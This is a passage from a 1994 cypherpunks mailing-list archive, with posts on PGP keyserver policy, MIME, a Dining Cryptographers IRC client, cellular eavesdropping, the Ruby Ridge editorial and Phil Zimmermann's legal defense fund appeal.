DEA agents. Pablo can't get their keys, and our heroic agents catch Pablo, and throw him in jail forever. (Naturally, we can substitute any well funded enemy of law enforcement for Pablo. The KGB works well.) ******************* Second scenario. A group of terrorists plan to blow up the world trade center. Plot 1: Our terrorists are smart, and don't call attention to themselves. Despite the FBI's ability to tap their communications, there is no reason to be watching the soon-to-be terrorists, and they set off a bomb. Plot 2: For some reason, there is probable cause, leading to the issue of a warrant. The FBI taps into the communication lines, and discovers that the Terrorists are using VoicePGP. They obtain a warrant, and through the use of an ELINT monitoring device near the computer in question, and get all the information they need. This scenario is different in that the terrorists are in locations known to the FBI, whereas Pablo does not know where the DEA agents are. If the location of the terrorists is not known, it is difficult to tap into their communications links. In closing, by only by allowing end users to continue controlling their own security technology, can you avoid creating a system where the interests of large blocks of users can be easily compromised. Adam Shostack -- "It is seldom that liberty of any kind is lost all at once." -Hume From warlord at MIT.EDU Fri Dec 16 13:38:53 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Fri, 16 Dec 94 13:38:53 PST Subject: KEYSRVR: tabula rasa? In-Reply-To: Message-ID: <9412162138.AA16688@toxicwaste.media.mit.edu> > Why is it possible for someone other than ME to add MY key to a keyserver? > I realize that at some point (perhaps only the first time you submit a > key?), there has to be some trust model employed, but it seems like this > anyone-can-submit-anyone-else's-key situation offers a very obvious attack: > anyone could propagate bogus keys across the net by just generating bogus > keys with someone else's email/name on them, leading to massive > impersonation problems. This has always been there. Many people consider it a feature. I like having the ability to tell a friend, who just signed my key, to just upload it to the keyserver, since the signature tends to do much more good being on the keyserver than being on my keyring. Also, because the keyserver uses PGP as a back end, it is possible to send multiple keys in a single message. You cannot do batch-processed incremental adds using PGP; if a keyfile contains multiple keys, there is no way to have a program only add specific additions. What about people who don't have email, or pseudonyms, or keys without email addresses? How do you deal with those, if you have to add your own key. And what about forged mail; I can easily send an email message claiming to be you. So what if I need to sign it? If I was creating a new key to spoof you, I _could_ sign it, and forge mail, and it would be added. So what? What does this buy you? Absolutely nothing! > Maybe I'm missing something obvious, but it seems like there should be a > more rigorous method available to, and employed by, keyserver operators for > verifying someone's identity before accepting a key submitted (supposedly) > by them. Shouldn't the key submission msg itself at minimum be required to > be contained within a signed msg from someone with enough "nearness" in > trust levels from some trusted introducer known to the keyserver op? I > thought this sort of situation was precisely the reason for the trust level > system in PGP in the first place. You are definitely missing something obvious! I will absolutely not do what you suggest here; I refuse. If you want rigorous key verifications then move into a PEM strict hierarchy (which I will perfectly well admit has its uses) or patronize the SLED database people, who will do what you want. What I want to provide with my keyserver is an easy way for anyone to distribute a PGP key easily. I don't care who you are, what you believe in, or what you want to accomplish, but if you want to let people have your PGP key, I want it on my server so others can get it. I think that many of the other keyserver operators believe as I do -- the role of a keyserver is key distribution, not key verification. Key verification is done very will in PGP itself. The method is called SIGNING A KEY. If you want to verify a key, check the signatures on it. This is exactly what the web of trust is about. If you trust me to sign keys, then you will trust the keys I've signed. If you don't trust me, then my signatures mean nothing. But you should never trust a key from the keyserver just because you obtained it from a keyserver. That's just plain stupid. > This may be a can of worms (or not), but if cpunks require fairly decent > methods for verifying the identities of people who want to trade keys with > them personally, then it seems keyservers should require at LEAST that > level of verification (or better). Again: ABSOLUTELY NOT! Keyservers are open to everyone; all comers welcome. Everyone from "Pr0duct Cypher" to "BlackNet" to "Jeffrey I. Schiller " is welcome to put their key on the keyservers. Again, there is a very big difference (which you clearly do not comprehend) between key distribution and key verification. The keyservers ONLY do the former, and you should do the latter. Doing otherwise is, as I said, stupid. > There doesn't seem to be any elegant mechanism available for doing this > yet, but I'm ready to be educated on this point. Any comments? Just add your new key to the keyservers and have people start using it. Life goes on. You are not the first to be in this situation, and you definitely will not be the last. I hope I've given you some insight. -derek Derek Atkins, SB '93 MIT EE, G MIT Media Laboratory Member, MIT Student Information Processing Board (SIPB) Home page: http://www.mit.edu:8001/people/warlord/home_page.html warlord at MIT.EDU PP-ASEL N1NWH PGP key available From tedwards at src.umd.edu Fri Dec 16 13:43:58 1994 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Fri, 16 Dec 94 13:43:58 PST Subject: Dining Cryptographers test bed client for IRC In-Reply-To: <9412161623.AA23186@chaos.intercon.com> Message-ID: I wrote up a short "test bed" for Dining Cryptographers over IRC (Internet Relay Chat). The implementation is not secure, as it uses PRIVMSGs to exchange flips between neighbors, but some good soul with a bit of time could go in and add DES encryption to them. The client allows for anonymous roundtable discussion between clients on a single IRC channel. The key-sharing graph is a ring, so it only takes two to collude to find what a particular person is sending, but that can be expanded also. There is no collision detection, but it is usually pretty obvious (i.e. if you send something and don't get it back, you know a collision happened). I also included a paper which has some discussion and references to making the DC implementation better, including things like protection against attacks coming from the IRC server itself, protection against someone sending stuff all the time disallowing service, etc. This has all been put in the cypherpunks ftp incoming directory. -Thomas From shamrock at netcom.com Fri Dec 16 14:32:13 1994 From: shamrock at netcom.com (Lucky Green) Date: Fri, 16 Dec 94 14:32:13 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) Message-ID: L. McCarthy wrote: >Right. We went through dozens of messages to establish that some people like >MIME and others don't, just as we did several weeks ago. What a surprise that >not much has changed since then. Bleeding wonderful. And we will go through it again and again and again until the ones who don't like MIME wake up to the fact that MIME is essential for todays and tomorrows email messages, namely solid email encryption that doesn't require much user intervention. Regardless what machine you use and what part of the net you live on. >Good standards are good. There's a revelation. Yep, we sure needed dozens of >messages to rehash that. Right. I agree it shouldn't take dozens of messages to get people to accept that. I have no idea why anyone who followed these threads still won't accept that MIME is a Good Thing and that MIME capable mailers (no mailers that claim to be MIME capable and aren't) are a Good Thing as well. >> > > Everything that has happened with MIME will happen again when people >> > > try to add cryptography to the structure of the net. >> > It seems to me that people are *already* trying to add cryptography to the >> > structure of the net, and that would actually be worth discussing. >> Yeah, like the PGP-MIME draft, which will open up the ability to >> effectively use PGP to more people than anything the cypherpunks have ever >> done :) > >So why not talk about that instead ? But we have. And everytime we do, someone out there says: "But my mailer doens't even handle todays MIME'd messages right. So it won't do tomorrows either." Why do you think this tread keeps comming back? -- Lucky Green PGP encrypted mail preferred. From jamesd at netcom.com Fri Dec 16 15:21:34 1994 From: jamesd at netcom.com (James A. Donald) Date: Fri, 16 Dec 94 15:21:34 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) In-Reply-To: Message-ID: L. McCarthy wrote: > >Right. We went through dozens of messages to establish that some people like > >MIME and others don't, just as we did several weeks ago. What a surprise that > >not much has changed since then. Bleeding wonderful. On Fri, 16 Dec 1994, Lucky Green wrote: > And we will go through it again and again and again until the ones who > don't like MIME wake up to the fact that MIME is essential for todays and > tomorrows email messages. Well it certainly is not essential for todays messages. Drop into alt.binaries.pictures.* When the news people wish to transmit pictures of naked girls, etc, they do not use MIME Now maybe they should use MIME, and maybe they will use MIME in the future, but today, MIME is still bleeding edge. If you want to fix that, start programming instead of shooting the messenger. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From anonymous-remailer at shell.portal.com Fri Dec 16 15:27:56 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 16 Dec 94 15:27:56 PST Subject: Tim May the Luddite Message-ID: <199412162327.PAA28290@jobe.shell.portal.com> Luck Green wrote: > I don't see any cheap shots or personal inuendos. Perhaps you missed McCoy's "fucking clueless" post? From anonymous-remailer at shell.portal.com Fri Dec 16 15:31:56 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 16 Dec 94 15:31:56 PST Subject: Amanda and MIME Message-ID: <199412162331.PAA28546@jobe.shell.portal.com> >> I think if we only use MIME, the quality of discussion on the list >> would skyrocket. Eric, you should block all non-MIME posts to the >> list. How could we have been so blind? >Perry wrote: >The anonymous poster should feel happy he's anonymous, as his posting >is embarassingly stupid. Perhaps he'd like to make fun of ASCII next >by posting his next message as sequences of octal digits. Ah, a vintage Perry post: full of insults, little discussion. Perry is unable to handle SARCASM. Perhaps better MIME software will help. From abostick at netcom.com Fri Dec 16 15:54:40 1994 From: abostick at netcom.com (Alan Bostick) Date: Fri, 16 Dec 94 15:54:40 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <9412161424.AA02172@snark.imsi.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <9412161424.AA02172 at snark.imsi.com>, you wrote: > > Timothy C. May says: > > My issue has not been with MIME as a transport mechanism, but > > non-ASCII content, which clearly most folks can't read. > > Far from clear, Tim. Last time I checked, almost no one I communicated > with regularly was using a machine without a pixmapped display. That > means that all standing in the way of them being able to read > non-ascii is the right font sitting on disk, and a program that groks > it. The right font on disk and a program that groks it. Aye, there's the rub. What makes this debate at once so fascinating and so frustrating is that both sides are correct. Yes, MIME is the standard that has emerged for exchanging non-ascii-text data via email, and yes it's a damned good one, properly implemented. And yes, anyone with the resources to do so ought to connect to their Internet service provider through a SLIP connection and be able to move through the Web with a good graphical browser and view their mail through their MIME-compliant mail program. If you can do it, then it is without a doubt the way to go. But at the same time Tim is right, too. SLIP connections, quality Web browsers, and MIME-compliant email packages are the high end of Net access today. They demand either an investment of money (intelligently spent) or an investment of effort to get the stuff up and running and to get the know-how needed to do so. Either of these can be more than many people who are now Internet users can afford. I think the people who are berating Tim for his apparent stubbornness should stop and think for a bit. It's not a simple matter of "We're right, so Tim must be wrong." The people who can look at the matter and see how the MIME advocates and Tim May are both right, without seeing a contradiction, will have a broader, deeper insight into the underlying problems, and be able to come up with solutions that reach farther. | For me, to be a feminist is to answer the Alan Bostick | question "Are women human?" with a yes. abostick at netcom.com | finger for PGP public key | Katha Pollitt, REASONABLE CREATURES Key fingerprint: | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79 +legal_kludge=off -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQB1AgUBLvH6FOVevBgtmhnpAQG/5AL/V8/wQC4ZVykdstm2hz3yutSi21CqXRQV +myk42dAO0+4YSgV1pSPEwSrfni2NKZa+HE9bzF8Cl2c+In5eb1hdkCYkfn3VlzV GsJyPBjAcUrHD626Wm18iBEYiD3cnDT9 =9vp0 -----END PGP SIGNATURE----- From shamrock at netcom.com Fri Dec 16 16:54:43 1994 From: shamrock at netcom.com (Lucky Green) Date: Fri, 16 Dec 94 16:54:43 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) Message-ID: L. McCarthy wrote: [regarding MIME] >Well it certainly is not essential for todays messages. > >Drop into alt.binaries.pictures.* > >When the news people wish to transmit pictures of naked girls, etc, >they do not use MIME > >Now maybe they should use MIME, and maybe they will use MIME in >the future, but today, MIME is still bleeding edge. I have dropped into alt.binaries.*. Thanks to my newsreader (freeware), the pictures there are a _mouseclick_ away from my harddrive. Even multi-part posts take ONE mouseclick. MIME isn't even needed here. Capable clients are. And they are avaialable today. All I am asking is that people start using them instead of complaining how difficult it is to do things on the net. --Lucky [who promisses to shut up -- for now] From lmccarth at ducie.cs.umass.edu Fri Dec 16 17:22:30 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Fri, 16 Dec 94 17:22:30 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) Message-ID: <199412170127.UAA21542@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Lucky Green writes: > L. McCarthy wrote: > [regarding MIME] Note that James Donald actually wrote this quoted text, not I: > >Well it certainly is not essential for todays messages. > > > >Drop into alt.binaries.pictures.* > > > >When the news people wish to transmit pictures of naked girls, etc, > >they do not use MIME > > > >Now maybe they should use MIME, and maybe they will use MIME in > >the future, but today, MIME is still bleeding edge. Lucky Green writes: > I have dropped into alt.binaries.*. Thanks to my newsreader (freeware), the > pictures there are a _mouseclick_ away from my harddrive. Even multi-part > posts take ONE mouseclick. Can you recommend an ftp site for this ? I'll try to get my sysadmins to install it here. (Assuming it's a Unix app.) What is it called ? - - -L. Futplex McCarthy, who likes MIME but is unhappy that his mailer does not properly support it - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvI9Rmf7YYibNzjpAQEGSwQAllo2RnniOUPmFBwyfqa7Y11DNpTobbJQ i7JxNQKjMmG+FvDepGITUz/8w870sRI7hTTETPcJbn4+gIQiHgqKZqZRMXnmzfQT 45Pc0FJXk3K7W/MmKvs57uJzumlfdGosi9prbA4EyUxLp/ZbUN1FBOwbg2NBe3h/ m79G8qNHqtA= =r6Ye - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvI+cCoZzwIn1bdtAQGYPgF/S0f4wuxn+/DSE5F1PS6gSBQEvycEYhrh 7vUg+bWqi6smF0WD44DqF2okiswC3J8i =+ptW -----END PGP SIGNATURE----- From pfinerty at seattleu.edu Fri Dec 16 17:56:11 1994 From: pfinerty at seattleu.edu (Patrick J. Finerty Jr.) Date: Fri, 16 Dec 94 17:56:11 PST Subject: VAX pgp uploaded to the cypherpunks site. Message-ID: i have uploaded pgp compiled for a VAX running VAX/VMS to the cypherpunks ftp site. here is a copy of the readme file i included with it. i should note that the reason i did this was primarily to provide pgp to people who do not have access to c compilers or a PC/DOS machine. this is, of course, not meant to substitute for checking the source and compiling pgp yourself. -----BEGIN PGP SIGNED MESSAGE----- VAXPGP262.TAR.Z is a compressed tar file containing the following docs.  NOTE!! - this is _not_ a complete pgp distribution. only the following files are included!  - ------------------------------------------------------------- APPNOTE.DOC;1 13/15 25-OCT-1994 10:30:52.79 BLURB.TXT;1 2/3 25-OCT-1994 10:30:31.21 CHANGES.DOC;1 41/42 25-OCT-1994 10:30:53.63 CONFIG.TXT;1 8/9 25-OCT-1994 10:30:23.93 KEYS.ASC;1 12/12 25-OCT-1994 10:30:56.06 KEYSERV.DOC;1 9/9 25-OCT-1994 10:30:31.52 LANGUAGE.TXT;1 135/135 25-OCT-1994 10:30:56.56 MITLICEN.TXT;1 5/6 25-OCT-1994 10:31:00.64 PGFORMAT.DOC;1 72/72 25-OCT-1994 10:30:47.91 PGP.1;1 40/42 25-OCT-1994 10:30:50.14 PGP.EXE;1 326/327 25-OCT-1994 10:58:19.24 PGP.HLP;1 8/9 25-OCT-1994 10:31:00.99 PGPDOC1.TXT;1 164/165 25-OCT-1994 10:30:41.65 PGPDOC2.TXT;1 262/264 25-OCT-1994 10:30:33.21 POLITIC.DOC;1 35/36 25-OCT-1994 10:30:51.42 PUBRING.PGP;1 28/30 5-DEC-1994 23:42:21.16 README.DOC;1 13/15 25-OCT-1994 10:31:01.51 SETUP.DOC;2 32/33 25-OCT-1994 10:30:32.07 - ------------------------------------------------------------- PGP.EXE is pgp2.6.2. compiled on a VAX running VAX/VMS 5.5-2. i compiled the program using the *build.com files that come with the standard pgp distribution BUT with TWO CHANGES. THESE CHANGES HAVE NO AFFECT ON PGP, THEY ONLY AFFECT THE CREATION OF THE RSA LIBRARY THAT IS DISTRIBUTED WITH PGP!! changes were to made to the rsabuild.com file, these were: 1) commented out: $ call compile md2c 2) commented out: $ call compile md5c other than these, no changes were made to the *.com files. i have tested this copy of pgp and it has worked perfectly with key generation and file signing as measured by generating keys on the VAX and then signing a file on the VAX followed by checking the signatures and key on a SUN using pgp2.6.2 that was compiled there. if you have a problem, please write me at: finerty at msscc.med.utah.edu pfinerty at nyx10.cs.du.edu pfinerty at seattleu.edu my pgp key is available via keyserver or finger. - -patrick finerty, jr. - -- patrick finerty -- finerty at msscc.med.utah.edu pfinerty at bach.seattleu.edu pfinerty at nyx10.cs.du.edu U of Utah biochem grad student/slave in the Bass lab easily found at (801) 585-3110 almost anytime. rm 207 wintrobe. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvERgU3Qo/lG0AH5AQEzbwP/UItMKPKv1dZ8g39aaX6qoQWRsd1tR5ko fIQ65i73qECD0swWxKAEUBKOz1bUo1tPr4u4cEvt3v4JYaUkrKaWZ58H9HkF7v47 SlDzZDHnZytcV1NzjEFsDYLMLFjuE6uMpGK9OjDP/cH4Z+PFkfVN6TNv4g6GL+Pa obY4/vId8sM= =nMyH -----END PGP SIGNATURE----- -- patrick finerty -- finerty at msscc.med.utah.edu pfinerty at bach.seattleu.edu pfinerty at nyx10.cs.du.edu U of Utah biochem grad student/slave in the Bass lab easily found at (801) 585-3110 almost anytime. rm 207 wintrobe. From mellswor at firewall.nielsen.com Fri Dec 16 18:07:32 1994 From: mellswor at firewall.nielsen.com (Mike Ellsworth) Date: Fri, 16 Dec 94 18:07:32 PST Subject: FV & PGP (was Re: First Virtual email security) Message-ID: <199412170212.VAA21903@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- James D. Wilson said: > >On Thu, 15 Dec 1994 nsb at nsb.fv.com wrote: > >> Moreover, if we supported PGP today, we might indirectly lend >> credibility to what we perceive as the incorrect belief that >> cryptography is NECESSARY for commerce. Because we see cryptography as >> helpful, but not necessary, we aren't going to support PGP right away, >> but will probably add such support when a large enough portion of our >> customer base wants it and can make use of it. > >Without cryptography how exactly are you going to protect my credit card >numbers from sniffer-snoopers and crackers? Either you will send the >credit card text in the clear, or it will be encrypted somehow. Or perhaps >you will have customers call you over the phone to give you their credit >card info? I would also like to be convinced on this point. It seems that it's an either/or. Either the info is in the clear, and thus vulnerable, or it's encrypted, and safer. - ------------------------------------- Mike Ellsworth mellswor at firewall.nielsen.com I find television very educating. Every time somebody turns on the set, I go into the other room and read a book. Groucho Marx (1890-1977) I'd be foolish to speak for my employer, now, wouldn't I? - ------------------------------------- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvJI7yoZzwIn1bdtAQEQHwGAxhCYdPFxK1leSvHJJB6uipGm1wJDPzTF h95k/mp0umUkc92T6hVccPnaKF1x47nI =PQWe -----END PGP SIGNATURE----- From avi at clas.ufl.edu Fri Dec 16 20:25:05 1994 From: avi at clas.ufl.edu (Avi Baumstein) Date: Fri, 16 Dec 94 20:25:05 PST Subject: rehash of fbi v. weaver, or 'freeh is a jerk' Message-ID: <1326.avi@clas.ufl.edu> i happen to be on the road in tennessee, and read this editorial in the knoxville new-sentinel. i don't remember seeing anything about this when it happened...but since freeh and the fbi seem to be disliked these days, here's some more fodder for the fire. -avi ps - hopefully this isn't a repeat, but being on the road, i'm mail-delayed at least 24 hours. The Knoxville News-Sentinel, Dec 16, 1994, pA16 DISTURBING SILENCE -FBI chief taking his time acting on report about Idaho shootout All eyes are on Louis Freeh, director of the Federal Bureau of Investigation, as he ponders disciplinary action in the infamous shootout at Ruby Ridge, Idaho, in 1992. This being the end of 1994, one starts to wonder what is taking the director so long. Excessive use of force by the FBI is no trivial matter. Citizens might gather from the Idaho case that the government claims special license to abuse the rights of loners with extremist views. It is a year and a half already since the government made a fool of itself by trying Randy Weaver and Kevin Harris for murder inthe death of a deputy US marshal. The jury sided with the defendants, and the US district judge said 75 percent of the evidence and testimony presented by the prosecution had aided the defense. But to go back to the beginning, Weaver, a former Green Beret, was a member of the Christian Identity sect and a racial speratist. He had retreated with his wife and children to a remote mountain cabin, where they and their young friend Harris lived. Weaver's first run-in with the law was induced by undercover agents. They offered to buy two shotguns from him if he sawed off the barrels, making the weapons illegal. He did so, and they arrested him. He failed to show up for trial, though the government later was forced to admit that he was given the wrong court date. Then began 20 months' surveillance of the Weaver cabin. On Aug. 21, 1992, the Weavers' dog discovered several agents camouflaged int he woods. The agents shot the dog. In the ensuing exchange of fire, 14-year-old Sam Weaver was killed by a bullet in the back, and Harris shot the deputy -- in self-defense, he said. The next day, the agents returned, reinforced by the 50-member Hostage Rescue Team. The commander of the HRT never attempted to interview the agents who survived the first encounter. Also, the FBI's policy on use of deadly force was relaxed: Instead of firing if lives were in danger, agents were ordered to shoot any armed adult at the scene. Thus was the stage set for final tragedy. An FBI marksman fired at Weaver and Harris outside the cabin. Both men were wounded, and Weaver's wife was killed, standing inside the cabin with her baby in her arms. A 542-page Justice Department report was completed last April. It has not been released. Director Freeh's disturbing silence is compunded by his promotion last week of the agent who had overall responsibility for the Weaver operation. What conclusion would Freeh recommend the public draw, if not that a federal government willing enough to jail overzealous Los Angeles policemen will arrogently circle the wagons to protect it's own? From die at pig.die.com Fri Dec 16 20:59:18 1994 From: die at pig.die.com (Dave Emery) Date: Fri, 16 Dec 94 20:59:18 PST Subject: Digital privacy In-Reply-To: <9412161623.AA23186@chaos.intercon.com> Message-ID: <9412170458.AA07961@pig.die.com> > > > >processed, it's >less likely that anyone could eavesdrop on > > >your conversations. > > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > > > ?Como? This is absolutely amazing! Amanda Walker writes: > > Well, it is true, from a pragmatic point of view. A neighborhood kid with a > Radio Shack scanner can't listen in on digital cellular calls. You have to > actually hack a phone, which is a much less prevalent skill. Both TDMA and CDMA cellular use digital echo surpressors which means that a simple hacked phone will only recover the base (landline) end of the conversation - almost all traces of the mobile end of the conversation will be eliminated by these DSP devices which are required to eliminate the otherwise very noticable echo due to the O(100 ms) delays of the vocoders used. Recovering the mobile end of a nearby call which is usually easy with FM analog cellular (AMPS and NAMPS) and a scanner, and usually unnecessary anyway due to the low return loss (high echo) of the wireline trunks and switches which makes the mobile caller's voice clearly audible on the base station transmission, will not be possible for either CDMA or TDMA using a hacked phone as both systems use more or less entirely different modulations and transmission techniques in the mobile to base direction. These modulations cannot be recovered by simply hacking the firmware of a phone - they require different signal processing electronics. And CDMA uses strict power control in the mobile to base direction which ensures that much of the time the mobile signal will be well below the threshold of detectability at a listening post located anywhere but very near the caller. > > I still think that CDMA+DES is the way to go for secure cellular, but from a > purely pragmatic point of view simply going digital does increase privacy. It greatly increases privacy against casual snooping, but of course does very little to protect against the kind of serious threat that both the TLA's (ours and theirs) and large criminal and industrial spy operations pose. As such it may lead people to be more careless because they have never seen the risk of cell call interception demonstrated and delude themselves into believing it is not possible. I hope that what interception is possible with hacked phones becomes widely visible so the illusion of security is not regained when the digital switch happens. And of course I repeat old news when I point out that the NSA and other TLA's have been quietly fighting a battle for years to keep cellphones from using effective encryption, and have so far blocked it out of the standards. > Using analog cellular is like using a walkie-talkie. Against serious threats, using any clear phone is like using a walkie talkie. Against nosey neighbors using an analog cellphone is of course not advisable for any kind of private conversation. It is certainly true that most people are much more threatened by their nosey neighbors than serious spies, however, and so digital cellphones will make calls much more private for ordinary people. Dave Emery N1PRE die at die.com From pfarrell at netcom.com Fri Dec 16 21:19:53 1994 From: pfarrell at netcom.com (Pat Farrell) Date: Fri, 16 Dec 94 21:19:53 PST Subject: Tim May the Luddite--His Last Message for A While Message-ID: <922.pfarrell@netcom.com> > It may be time for me to move on. More than 2 years on this list, > since the B.C. period, may be too long. I've been thinking the same thing. Sadly, some of the initial C'punks are those that are amoung the worst flamers. Eric and Perry should be leading by example, but that isn't the case. Recently, I was encouraged by the number of outsiders willing to post. The folks from Netscape were just the most recent. But they were greeted with massive hostility because their code isn't perfect, or maybe because they are trying to make a buck. Sometimes releasing code sooner means that you will be arround later to fix it. Even Amanda, who I first saw posting to comp.fonts when she worked for Visix, has not been showing her usual diplomacy. Cypherpunks write code, and care about politics, technology, society and economics. Cypherpunks will continue. I'm not so sure about the cypherpunks list. I'm not willing to bet that it will be different than Extropians. Pat Pat Farrell Grad Student pfarrell at cs.gmu.edu Department of Computer Science George Mason University, Fairfax, VA Public key availble via finger #include From hmiller at orion.it.luc.edu Fri Dec 16 22:02:27 1994 From: hmiller at orion.it.luc.edu (Hugh Miller) Date: Fri, 16 Dec 94 22:02:27 PST Subject: Revised - Zimmermann Defense Fund Appeal Message-ID: <9412170602.AA35876@orion.it.luc.edu> Tom Bryce at Duke (thanks, Tom!) has pointed out an important erratum in my original fundraising post. I mistakenly gave out Phil Dubois's net.address as "dubois at csm.org". This is WRONG: the correct address is: dubois at csn.org I apologize for the error. Since the post was signed, and just patching it will mung the md5 hash, I have included the whole message below. If you are reposting the message to other outlets, please use this new revision (version 1.1!) instead. Also, Irving Wolfe (thanks, Irving!) wrote me to suggest that persons interested in donating to Phil's defense fund might like to see some bona fides of my (and Phil Dubois's) relation to Phil Zimmermann, to insure that the money donated is going where we say it is. I've included something which (I hope) might go some way towards addressing this concern in the revised post too. Best wishes for a Happy Holidays to all on the Net (and off)! ----------------------->% CUT HERE %<------------------------- -----BEGIN PGP SIGNED MESSAGE----- Phil Zimmermann Legal Defense Fund Appeal In November, 1976, Martin Hellman and Whitfield Diffie announced their discovery of public-key cryptography by beginning their paper with the sentence: "We stand today on the brink of a revolution in cryptography." We stand today on the brink of an important battle in the revolution they unleased. Philip Zimmermann, who encoded and released the most popular and successful program to flow from that discovery, Pretty Good Privacy ("PGP"), may be about to go to court. It has been over fourteen months now since Phil was first informed that he was the subject of a grand jury investigation being mounted by the San Jose, CA, office of US Customs into the international distribution, over the Internet, of the original version of the program. On January 12th, Phil's legal team will meet for the first time with William Keane, Assistant US Attorney for the Northern District of California, who is in charge of the grand jury investigation, in San Jose. An indictment, if one is pursued by the government after this meeting, could be handed down very shortly thereafter. If indicted, Phil would likely be charged with violating statute 22 USC 2778 of the US Code, "Control of arms exports and imports." This is the federal statute behind the regulation known as ITAR, "International Traffic in Arms Regulations," 22 CFR 120.1 et seq. of the Code of Federal Regulations. Specifically, the indictment would allege that Phil violated 22 USC 2778 by exporting an item listed as a "munition" in 22 CFR 120.1 et seq. without having a license to do so. That item is cryptographic software -- PGP. At stake, of course, is far more than establishing whether Phil violated federal law or not. The case presents significant issues and will establish legal precedent, a fact known to everyone involved. According to his lead counsel, Phil Dubois, the US government hopes to establish the proposition that anyone having anything at all to do with an illegal export -- even someone like Phil, whose only involvement was writing the program and making it available to US citizens and who has no idea who actually exported it -- has committed a federal felony offense. The government also hopes to establish the proposition that posting a "munition" on a BBS or on the Internet is exportation. If the government wins its case, the judgment will have a profound chilling effect on the US software industry, on the free flow of information on the emerging global networks, and in particular upon the grassroots movement to put effective cryptography in the hands of ordinary citizens. The US government will, in effect, resurrect Checkpoint Charlie -- on the Information Superhighway. By now, most of us who are reading this know about Phil and the case, whether by having the program and reading the doc files or by seeing reports in the Wall Steet Journal, Time, Scientific American, the New York Times, Wired, US News and World Report, and hundreds of other news outlets; on Usenet groups like talk.crypto.politics or alt.security.pgp; or by listening to Phil give talks such as the one he gave at CFP '94 in Chicago. We know that PGP has made great strides since version 1.0, and is now a sophisticated encryption and key-management package which has become the de facto standard in both micro and mainframe environments. We know that Phil and the PGP development team successfully negotiated a commercial license with Viacrypt, and, through the efforts of MIT, a noncommercial license for PGP with RSA Data Security, the holders of the patent on the RSA algorithm on which PGP is based, thus freeing the program from the shadow of allegations of patent infringement. We know that programs such as PGP represent one of our best bulwarks in the Information Age against the intrusions of public and private information gatherers. We know that PGP is a key tool in insuring that the "Information Superhighway" will open the world to us, without opening us to the world. What we may not all know is the price Phil has had to pay for his courage and willingness to challenge the crypto status quo. For years now Phil has been the point man in the ongoing campaign for freely available effective cryptography for the everyday computer user. The costs, personal and professional, to him have been great. He wrote the original code for PGP 1.0 by sacrificing months of valuable time from his consulting career and exhausting his savings. He continues to devote large amounts of his time to testifying before Congress, doing public speaking engagements around the world, and agitating for "cryptography for the masses," largely at his own expense. He is now working, still for free, on the next step in PGP technology, PGP Phone, which will turn every PC with a sound card and a modem into a secure telephone. And we know that, just last month, he was searched and interrogated in the absence of counsel by US Customs officials upon his return from a speaking tour in Europe. Phil's legal team consists of his lead counsel, Philip Dubois of Boulder, CO; Kenneth Bass of Venable, Baetjer, Howard & Civiletti, in Washington, DC, first counsel for intelligence policy for the Justice Department under President Carter; Eben Moglen, professor of law at Columbia and Harvard Universities; Curt Karnow, a former assistant US attorney and intellectual property law specialist at Landels, Ripley & Diamond in San Francisco; and Thomas Nolan, noted criminal defense attorney in Menlo Park. While this is a stellar legal team, what makes it even more extraordinary is that several of its members have given their time for free to Phil's case. Still, while their time has been donated so far, other expenses -- travel, lodging, telephone, and other costs -- have fallen to Phil. If the indictment is handed down, time and costs will soar, and the members of the team currently working pro bono may no longer be able to. Justice does not come cheap in this country, but Phil deserves the best justice money can buy him. This is where you and I come in. Phil Dubois estimates that the costs of the case, leaving aside the lawyers' fees, will run from US$100,000 - $150,000. If Phil's team must charge for their services, the total cost of the litigation may range as high as US$300,000. The legal defense fund is already several thousand dollars in the red and the airline tickets to San Jose haven't even been purchased yet. In September, 1993 I wrote a letter urging us all to support Phil, shortly after the first subpoenas were issued by Customs. Today the need is greater than ever, and I'm repeating the call. Phil has assumed the burden and risk of being the first to develop truly effective tools with which we all might secure our communications against prying eyes, in a political environment increasingly hostile to such an idea -- an environment in which Clipper chips and digital telephony bills are our own government's answer to our concerns. Now is the time for us all to step forward and help shoulder that burden with him. It is time more than ever. I call on all of us, both here in the US and abroad, to help defend Phil and perhaps establish a groundbreaking legal precedent. PGP now has an installed base of hundreds of thousands of users. PGP works. It must -- no other "crypto" package, of the hundreds available on the Internet and BBS's worldwide, has ever been subjected to the governmental attention PGP has. How much is PGP worth to you? How much is the complete security of your thoughts, writings, ideas, communications, your life's work, worth to you? The price of a retail application package?i Send it. More? Send it. Whatever you can spare: send it. A legal trust fund, the Philip Zimmermann Defense Fund (PZDF), has been established with Phil Dubois in Boulder. Donations will be accepted in any reliable form, check, money order, or wire transfer, and in any currency, as well as by credit card. You may give anonymously or not, but PLEASE - give generously. If you admire PGP, what it was intended to do and the 